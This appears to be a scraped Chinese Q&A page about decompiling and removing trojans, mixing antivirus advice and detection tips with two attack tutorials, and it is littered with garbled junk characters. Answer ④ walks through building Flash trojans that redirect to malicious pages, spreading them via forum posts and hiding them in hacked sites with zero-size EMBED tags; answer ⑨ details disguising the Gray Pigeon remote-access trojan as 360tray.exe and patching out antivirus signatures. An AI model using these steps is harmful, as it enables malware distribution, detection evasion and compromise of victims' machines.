木馬如何反編譯

① 可以反編譯木馬apk嗎

您好
如果木馬APK源代碼沒有加密

是可以通過反編譯軟體進行反編譯的

如果您反編譯的目的是為了修改木馬繼續傳播，請不要傳播病毒、盜號木馬程序，惡意傳播病毒和木馬會污染互聯網環境，請您加入到維護網路安全的大軍中！

QQ木馬程序會導致您和他人的帳號和密碼泄露，從而可能使您和他人的QQ財產，如游戲、QB等受到嚴重威脅，嚴重的還會違反法律。
請您不要輕易安裝陌生人傳送給您的未知文件，有可能是病毒或者木馬。
建議您安裝騰訊電腦管家對您的電腦進行實時防護，保護您的電腦安全運行，避免給您的財產和個人隱私帶來威脅。
騰訊電腦管家企業平台：http://..com/c/guanjia/

② 能否對病毒木馬進行反編譯

能

③ 如何破解木馬程序

您好，對於我們一般使用電腦的普通用戶而言，破解木馬程序其實是很難的，因為其中有很多個代碼，交錯復雜一環扣一環，需要具有反編譯能力的人才有可能破解的。

不過您可以使用電腦管家來講木馬程序徹底殺除，從根本上阻止其破壞電腦。

電腦管家擁有基於CPU虛擬執行技術，可以徹底根除電腦中的木馬病毒。

希望幫助到您，電腦管家竭誠為您服務，您的支持是我們的動力，望採納。

管家下載地址騰訊電腦管家官網

騰訊電腦管家企業平台：http://..com/c/guanjia/

④ 木馬的編程是什麼

一、製作Flash動畫木馬的准備 _1@2{3|$^'M!A程序開發，操作系統，伺服器，源碼下載，Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇 Flash動畫木馬的原理，是在網頁中顯示或本地直接播放Flash動畫木馬時，讓Flash自動打開一個網址，而該網址就是我們預先製作好的一個木馬網頁。也就是說，在製作網頁木馬前，我們首先需要製作好一個網頁木馬，並將它放置到某個網站上去。 %H8H7W*B%N,|:^4i+p6U 另外，我們還需要准備一個比較吸引人的Flash動畫文件「MM熱舞.swf」，以及Flash動畫反編譯工具「閃客精靈」，編輯工具Macromedia Flash MX。 二、最原始的Flash木馬 (X8h4s8G8L"G程序開發，操作系統，伺服器，源碼下載，Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇 現在雖然有了許多各種各樣的Flash動畫木馬製作工具，但是為了了解Flash動畫木馬的最基本原理，有必要從頭開始用最原始的方法製作一個Flash木馬。 'h'C(U$R'I1L2v"ttech.techweb.com.cn 步驟一：反編譯SWF動畫-O7c$^,d"h&Q7v5W 首先我們需要將要插入網頁木馬的Flash動畫文件「MM熱舞.swf」，反編譯成可編輯的.fla格式。運行「閃客精靈」，點擊菜單「文件」→「快速打開」命令，指定「MM熱舞.swf」文件將其導入。然後點擊工具欄上的「導出FLA」命令，將動畫導出為「MM熱舞.fla」文件。 5?-^9_-h)b8F3I,E;m5F 步驟二：插入網頁木馬代碼9t!m*W,{5q%\6j"H!]6n"f 然後運行Flash動畫編輯器Macromedia Flash MX，點擊菜單「文件」→「打開」，調入剛才保存的fla文件。展開界面下方的「動作/幀」欄，再展開「動作」→「瀏覽器/網路」項，點擊其中的「getURL」命令，在右邊窗口中的「URL」裡面輸入我們的網頁木馬地址;窗口方式為「_blank」;「變數」設置為「使用GET方式發送」，在下方的代碼窗口中將出現「getURL("http://網頁木馬地址", "_blank", "GET");」。tech.techweb.com.cn ^#o ~4V%{:m5z4E/H b;W 補充： 步驟三：生成Flash木馬 -V"L$o(t8H6m9l)rtech.techweb.com.cn 設置完畢後保存文件，並點擊菜單「文件」→「發布」命令，將動畫重新導出為SWF格式。用IE瀏覽器打開剛才生成的Flash動畫木馬，可以看到隨著Flash動畫打開播放時，自動彈出一個瀏覽器窗口，裡面將會顯示我們的木馬網頁。 接著~~~~~ 三、簡簡單單生成Flash木馬tech.techweb.com.cn*S0m7p#o5A p7S#C6l2z&f9e 程序開發，操作系統，伺服器，源碼下載，Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇-q"R1h8o8j0Z5c 上面插入木馬的過程比較麻煩，下面我們介紹一個簡單的方法，也正是這些簡單的工具使得Flash木馬在網上隨處可見。 6V5n8`!I0R/c6~,e程序開發，操作系統，伺服器，源碼下載，Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇+z%m3L'k&}6M2` 運行SWF木馬插入器，點擊界面中的「選擇」按鈕，瀏覽指定要插入木馬的SWF文件;在「插入代碼」中輸入木馬網頁的地址;切記不要勾選下面的「只解壓」項。設置完畢後，點擊「給我插」按鈕，程序提示開始插入木馬網頁。顯示成功信息後，關閉程序，用IE打開生成的動畫，可以看到自動跳轉到木馬網頁去了。 2v)l8e"^5H9^&[#_!l 9{7l#Z+X"J(P @,B 四、Flash木馬的利用 9U+p6W;d;D7e+F9Ktech.techweb.com.cn 4W6Z4W1v4V"}4A/D$t._0_7P1o 看到上面的步驟了吧，生成一個Flash動畫木馬是不是很簡單? 那麼生成的Flash木馬該如何應用呢?只要我們將Flash上傳到某個網站中，就可以通過論壇或網站之類的直接利用了。 補充： #B&c)e#c9A%`-w程序開發，操作系統，伺服器，源碼下載，Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇+|,K({&L#P2n:\6^ 大部分的論壇中都可以發來Flash動畫的帖子，利用論壇發帖，攻擊者可以快速獲得大量的肉雞。以PHPWind v4.3.2 論壇為例，在發帖或回復時，點擊編輯窗口上方的「插入Flash動畫」按鈕，設置Flash窗口大小，使用默認設置後，要求輸入Flash的URL地址。確定後，可以看到編輯窗口中顯示的代碼為「「(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)」」，這就是完整的Flash播放代碼了，不同的論壇代碼是不一樣的。TechWeb-技術社區5h4n8X5]/@'G+`'R'i %`6W'e)~"h 應用二：網頁嵌入Flash木馬"U3S9Z3v ^ 1q8X!h-V+V0T 攻擊者入侵了某個大的網站之後，很可能在網站首頁掛馬，使用普通方式掛馬會被管理員發覺，但是掛上Flash木馬的話，是很難查殺的。攻擊者可能在網頁中插入如下代碼：8y1o*@6L&l5k8L i8a9u%A,h5@/w 「《EMBED src=http://網頁木馬地址/木馬.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》」，其中的《》改為<>。 $B;{)o,j5C,A.H;Z(sTechWeb-技術社區5L/b)o'K,m:s'i1t 這里的參數「width=0 height=0」表示，Flash播放窗口為零，也就是不顯示Flash播放窗口。其它用戶瀏覽網頁時，就會莫名其妙的彈出一個木馬網頁窗口。 '^9e#G)n:X-j*T 1f6F#k.z&j3G

滿意請採納

⑤ 如何反編譯木馬程序

木馬程序是一種程序，它能提供一些有用的，或是僅僅令人感興趣的功能。但是它還有用戶所不知道的其他功能，例如在你不了解的情況下拷貝文件或竊取你的密碼。

RFC1244(Request for Comments:1244)中是這樣描述木馬的：「木馬程序是一種程序，它能提供一些有用的，或是僅僅令人感興趣的功能。但是它還有用戶所不知道的其他功能，例如在你不了解的情況下拷貝文件或竊取你的密碼。」隨著互聯網的迅速發展，木馬的攻擊、危害性越來越大。木馬實質上是一個程序，必須運行後才能工作，所以會在進程表、注冊表中留下蛛絲馬跡，我們可以通過「查、堵、殺」將它「緝拿歸案」。

查

1.檢查系統進程

大部分木馬運行後會顯示在進程管理器中，所以對系統進程列表進行分析和過濾，可以發現可疑程序。特別是利用與正常進程的CPU資源佔用率和句柄數的比較，發現異常現象。

2.檢查注冊表、ini文件和服務

木馬為了能夠在開機後自動運行，往往在注冊表如下選項中添加註冊表項：

HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Run

HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunOnce

HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunOnceEx

HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunServices

HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunServicesOnce

木馬亦可在Win.ini和System.ini的「run=」、「load=」、「shell=」後面載入，如果在這些選項後面載入程序是你不認識的，就有可能是木馬。木馬最慣用的伎倆就是把「Explorer」變成自己的程序名，只需稍稍改「Explorer」的字母「l」改為數字「1」，或者把其中的「o」改為數字「0」，這些改變如果不仔細觀察是很難被發現。

在Windwos NT/2000中，木馬會將自己作為服務添加到系統中，甚至隨機替換系統沒有啟動的服務程序來實現自動載入，檢測時要對操作系統的常規服務有所了解。

3.檢查開放埠

遠程式控制制型木馬以及輸出Shell型的木馬，大都會在系統中監聽某個埠，接收從控制端發來的命令，並執行。通過檢查系統上開啟的一些「奇怪」的埠，從而發現木馬的蹤跡。在命令行中輸入Netstat na，可以清楚地看到系統打開的埠和連接。也可從www.foundstone.com下載Fport軟體，運行該軟體後，可以知道打開埠的進程名，進程號和程序的路徑，這樣為查找「木馬」提供了方便之門。

4.監視網路通訊

對於一些利用ICMP數據通訊的木馬，被控端沒有打開任何監聽埠，無需反向連接，不會建立連接，採用第三種方法檢查開放埠的方法就行不通。可以關閉所有網路行為的進程，然後打開Sniffer軟體進行監聽，如此時仍有大量的數據，則基本可以確定後台正運行著木馬。

堵

1.堵住控制通路

如果你的網路連接處於禁用狀態後或取消撥號連接，反復啟動、打開窗口等不正常現象消失，那麼可以判斷你的電腦中了木馬。通過禁用網路連接或拔掉網線，就可以完全避免遠端計算機通過網路對你的控制。當然，亦可以通過防火牆關閉或過濾UDP、TCP、ICMP埠。

2.殺掉可疑進程

如通過Pslist查看可疑進程，用Pskill殺掉可疑進程後，如果計算機正常，說明這個可疑進程通過網路被遠端控制，從而使計算機不正常。

殺

1.手工刪除

對於一些可疑文件，不能立即刪除，有可能由於誤刪系統文件而使計算機不能正常工作。首先備份可疑文件和注冊表，接著用Ultraedit32編輯器查看文件首部信息，通過可疑文件裡面的明文字元對木馬有一個大致了解。當然高手們還可以通過W32Dasm等專用反編譯軟體對可疑文件進行靜態分析，查看文件的導入函數列表和數據段部分，初步了解程序的主要功能。最後，刪除木馬文件及注冊表中的鍵值。

2.軟體殺毒

由於木馬編寫技術的不斷進步，很多木馬有了自我保護機制。普通用戶最好通過專業的殺毒軟體如瑞星、金山毒霸等軟體進行殺毒，對於殺毒軟體，一定要及時更新，並通過病毒公告及時了解新木馬的預防和查殺絕技，或者通過下載專用的殺毒軟體進行殺毒(如近期的沖擊波病毒各大公司都開發了查殺工具)。

⑥ 木馬怎麼反編譯

不懂匯編是不行的，你這樣說證明你不懂，不要緊，現在就開始學，還不算晚

⑦ 請教如何反編譯手機木馬

反編譯安裝後的exe文件,網上有很多反編譯的軟體,反匯編後估計要讀懂也比較困難

⑧ 今天電腦中病毒了，提供病毒文件誰能反編譯一下

這表現和autorun病毒一個樣哈，起碼類似，形式。

⑨ 如何給木馬做免殺

給木馬穿上隱身衣
精心配置木馬灰鴿子黑方專版，做示範講解
打開---配置服務程序----自動上線設置（自定義按需要）-----安裝設置（要把安裝路徑修改為$（windir）\360tray.exe,）並把文件安裝後自動刪除安裝文件的勾去掉---啟動項設置（顯示名稱為360tray.exe）----最後描述信息為「360安全衛士適時保護模塊。配置完成後，發布生成木馬，並雙擊測試能否正常上線，確認可以後便開始對他進行符合定位特徵碼進行免殺設置，這里將生成的木馬存粗放在桌面上，並命名為MM.EXE
二，定位特徵碼，定位之前我們先要吧MM進行壓縮編輯，蟄樣及去掉部分垃圾代碼，讓木馬正常運行，重要的是後期查找特徵碼能節約一半的時間。
打開simplepack軟體 見MM.EXE 拖入軟體界面，在選項中勾選「創建備份文件「並選擇方式1」壓縮資源「最後單擊壓縮，壓縮後的mm一樣可以上線，
2經接著對壓縮後的mm進行特徵碼的定位，打開myccl「符合碼定位器」軟體，單擊文件按鈕將mm.exe導入，將下面輸入目錄設置為」c:\users\adinistrator\desktop\OUTPUT,把分塊個數改為100 接著單擊 特徵區間按鈕 最後單擊生成按鈕 此時窗口提示 請對生成目錄驚醒殺毒 殺毒完成後請點擊 《二次處理》按鈕 確定後開始對對桌面上的output文件夾進行殺毒 ，
查到病毒後，點擊「清除病毒」並將下面的「用相同方式處理此類問題」勾上，這時會殺掉100 多個病毒文件，完成殺毒後回到myccl窗口這里繼續單擊 二次處理 按鈕 軟體提示「程序找到一個特徵碼，是否繼續生成文件特徵碼，但可能還會生成其他特徵碼，是否繼續進行生成文件分析，？ 這里單擊yes 按鈕 此時繼續對桌面上的」output」 文件進行殺毒 重復處理 知道查不出病毒為止，
查完後myccl;右側的特徵碼區間設定，回查找特徵碼如：00000e0---00001db 有機特徵碼並選擇「符合定位此處特徵，接著將分塊個數填上 100繼續生成，output 文件夾進行殺毒定位其他特徵碼， 幾次定位後 最後定到單位長度為2 最終得到一個特徵碼，，將它記下，假設我們這里得到的最重復合特徵碼是：00545cc—0000005這里我們只要記下前面的00545cc即可，他就是瑞星判斷mm的特徵碼 正是我們想要的，、
修改特徵碼。
得到瑞星對mm的特徵碼，緊接著我們要對利用c32asm軟體對mm進行編譯，吧00545cc編碼重新編寫 使程序跳過oo545cc 這樣不支持就不會被瑞星發現了，最後生成mm.exe就是最終的超級免殺木馬，let go
啟動c32asm將mm打開進行反編譯，此時右鍵滑鼠—選擇（對應HEX編輯）在編輯模式下找到00545cc這項，但最終我們只找到這項和00545c0和答案接近，不要急其實他就是我們要找的特徵碼所在，在他後邊找到e5然後右擊滑鼠「對應匯編模式編輯」
此時在匯編模式下找「00545cc」代碼 並將下面一項一並復制下來，內容如下00545cc:83c8 ff or eax ffffffff
004545cf ff6424 20 jmp near [esp+20]
接著在該模式下去尋找 一段空的位置 （也就是匯編為00的位置）例如004000212 右鍵滑鼠選擇（匯編「並在窗口輸入jmp 00400039.這丫給我們創建了一個跳轉的空區域 這是程序不運行的，下來我們就要在這里做文章了，
選中00545cc的匯編代碼or eax ffffffff 復制 接著來到剛才的的空區域里隨便個位置右擊匯編項 在彈出窗口中將粘貼進去 單擊匯編 結束 緊接著在該劇的下邊一句輸入匯編命令 jmp 004545cf 單擊匯編 結束 後便繼續找回 00545cc選擇匯編輸入 NOP命令 把該句的 NOP去掉 接著在該句右擊滑鼠選擇匯編輸入jmp 00400021命令。最後單擊文件，另存為給該木馬從型包裝的成mm.exe命令
雙擊mm.exe發現灰鴿子可以正常上現了，在查殺 沒有找到病毒， 至此這個超級muma

⑩ 一個電影文件和一個木馬編譯成後綴為exe的文件，怎麼把木馬去掉，或反編譯出電影名謝謝

這種木馬的毒害性很強，往往你把木馬殺掉，電影也就不能觀看了，
有一個辦法值得一試
卡巴斯基有個「清除」功能，不同於一般殺毒軟體的刪除，可以把這種滲入型的木馬殺除，很少出現破壞原程序的，我有個小游戲就這樣解決的